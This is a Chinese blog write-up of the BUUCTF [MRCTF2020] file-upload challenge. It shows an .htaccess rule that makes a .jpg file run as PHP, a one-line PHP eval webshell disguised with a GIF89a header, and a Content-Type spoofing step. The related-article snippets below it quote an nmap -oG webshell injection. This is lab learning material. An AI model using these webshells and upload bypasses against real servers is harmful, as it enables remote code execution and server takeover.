【学习笔记 40】 buu [MRCTF2020]你传你呢

最新推荐文章于 2024-05-06 12:28:15 发布
最新推荐文章于 2024-05-06 12:28:15 发布
阅读量411 收藏 2
点赞数 1
分类专栏: ctf 学习笔记 文件上传 文章标签: php web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43553654/article/details/107742850
版权
学习笔记 同时被 3 个专栏收录
50 篇文章 1 订阅
订阅专栏
ctf
47 篇文章 1 订阅
订阅专栏
文件上传
3 篇文章 0 订阅
订阅专栏

0x00 知识点

  1. .htaccess文件上传绕过

0x01 知识点详解

  1. 什么是.htaccess文件?
    答:htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
  2. 怎么利用.htaccess文件进行上传?
    答:我们可以在.htaccess文件文件中加入php解析规则,比如,本题中就利用这个解析规则将jpg文件解析成php文件来执行。

0x02 解题思路

  1. 打开网站一看,不出意外应该是考察文件上传的题目在这里插入图片描述
  2. 上传php文件,phtml文件,上传jpg文件之后改后缀都不行,但是发现只要上传的文件是jpg文件或者png文件都可以上传,并且还会回显上传路径。
  3. 直接上传jpg结尾的一句话木马并不会解析,那我们是不是可以在上传一个.htaccess文件让我们自己来定义php的解析规则,开始尝试
    首先上传一个.htaccess文件
<FilesMatch "yjh.jpg">
 SetHandler application/x-httpd-php
</FilesMatch>

上传抓包
!请添加图片描述请添加图片描述这里注意.htaccess无法直接上传,需要改Content-Type: image/jpeg才可以
之后上传呢yjh.jpg文件

GIF89a
<?php @eval($_POST['lla']);?>

这个直接上传就行了,不用抓包了。在这里插入图片描述记住这个路径,直接利用菜刀或者蚁剑这种webshell工具连接就好了
这个就是我的连接路径

http://2bef5319-b7e2-44c5-8f19-5b718e5475ec.node3.buuoj.cn/upload/bc4440a0c8762723bc7dac811e3137fb/yjh.jpg

在这里插入图片描述
之后再根目录里找到flag

0x03 防护措施

  1. 最简单的方法就是给upload文件夹设置不可执行的权限就可以了。
Noslpum
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
学习笔记 44】 buu [MRCTF2020]Ez_bypass
weixin_43553654的博客
08-03 246
0x00 知识点 绕过md5()函数 绕过is_numeric()函数 代码审计 0x01 知识点详解 md5()函数怎么绕过? 答:本题是将两参数成数组,由于md5()函数无法操作数组,也就判断都为null,像个参数的md5值也就相同了。 is_numeric()函数怎么绕过? 答:is_numeric() 函数用于检测变量是否为数字或数字字符串。本题由于在这个函数之后还有一个弱类型比较,所以要用1234567a绕。1234567a是字符串,但是弱类型比较的时候,1在前,php会将其整体转成数字,
PWN学习笔记 NSS
2301_79525044的博客
02-19 263
payload1=b'a'*(0x10)+p64(rdi)+p64(0)+p64(rsi)+p64(buf/*写入/bin/sh的地址,如bss段*/)+p64(rdx)+p64(8)+p64(elf.sym['read'])#调用read函数,将/bin/sh写入buf。syscall:ROPgadget --binary 文件名 | grep syscall。在gdb中 i r fs_base #得到fs_base 十六进制数据 十进制数据。关闭canary:-fno-stack-protector。
BUUCTF例题知识点(二)
2301_80911344的博客
04-29 435
file_get_contents() 把整个文件读入一个字符串中。该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。
buu刷题(2)
pwfortune的博客
04-01 828
分析代码,对GET参的 str 值反序列化,我们需要 read()这个函数 ,去读取flag.php,得到flag,所以将op的值改为2,file的值为flag.php,但是__destruct()会将op的值改为2,需要将它绕过,分析代码,需要GET参 text&file&password 三个参数,file 参的值不能有flag,password参的值会反序列化,file_get_contents 得到文件里的内容,并且还要与。
BUU web wp2
qq_74825121的博客
02-21 1335
web题解
21 07 27学习总结
eeeeeight的博客
07-29 180
21.07.27学习总结 Column: July 27, 2021 Tags: learning experience 前言: 前几天在忙xctf和拆笔记本电脑, 除了自己撸出一道ctb外, 没什么其它实际产出(因为装内核一直失败), 所以就没怎么写博客 06:00-08:00: buu刷题, roarctf_2019_easy_pwn版本下错了…然后捣腾了两个小时, 学到了realloc_hook写onegadget的方法 16:00-16:30: buu刷题: wustctf2020_getshell
BUUCTF笔记Web系列部分WriteUp(三)
克格莫
05-22 5705
1、[CISCN2019 华北赛区 Day2 Web1]Hack World 最近多做做sql注入,感觉自己在这一块还是很菜,进去就给了提示flag在flag表的flag字段
2024年最新pwn入门-buu第二页题解(32道)(持续更新中)(2),设计思想与代码质量优化+程序性能优化+开发效率优化
最新发布
2401_84254011的博客
05-06 856
在main函数里面发现gitf和vuln函数,先点进gift函数看看,发现有print(format),格式化字符串漏洞啊.那么有什么用呢?别急接着往下看看到vuln函数可以栈溢出,哎,但是这个v2 = __readfsqword(0x28u)是什么意思呢?
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 5万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 391
buuctf pwn 第三页
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强...
2020网鼎杯青龙组Boom
05-12
【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段,可能...
POSN:POSN-BUU的源代码
04-01
POSN(Positioning System)是一种用于...要深入理解POSN-BUU的具体实现,你需要阅读源代码、了解其设计思路和算法,并结合实际的硬件环境和数据输入进行分析。通过这种方式,你可以逐步掌握这个定位系统的运作机制。
2020年网鼎杯青龙组赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
学习笔记 43】 buu [BJDCTF 2nd]简单注入
weixin_43553654的博客
08-02 1085
0x00 知识点 \转义单引号 整型注入 二分法脚本 0x01 解题思路 打开网站一看, 再尝试在用户名和密码处尝试进行注入,发现‘,“都会报错,之后用御剑一扫,发现hint.txt文件。访问一下看看 提示说之后正确的用户和密码才能登上去,得到flag。之后给出了参方式和mysql命令语句。 这时候很明显username处注入\来转义单引号,password处使用sql语句整数型注入。 举个例子: a. 入admin\ 和 or/**/length(database())>0#会回显st
学习笔记 48】 buu [网鼎杯 2020 朱雀组]Nmap
weixin_43553654的博客
08-11 683
0x00 知识点 NMAP中使用-0G命令可以实现代码写入 0x01 解题思路 打开网站一看发现是一个NMAP网站尝试输入输入任意ip 可以看到这里返回了nmap扫描的结果,这里我们就想到了NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 ' <?php @eval($_POST["cmd"]);?> -oG shell.php ' 尝试后发现报错,说明这里有过滤不能直接进行,最后利用fuzz发现过滤了php
学习笔记15】buu [BUUCTF 2018]Online Tool
weixin_43553654的博客
05-15 641
打开一看,发现给了一大串代码,接下来进行审计 if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $_SERVER['REMOTE_ADDR']=$_SERVER['HTTP_X_FORWARDED_FOR']; } //首先看到前两行代码X_FORWARDED_FOR和REMOTE_ADDR这里是让服务器用来获取ip用...
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值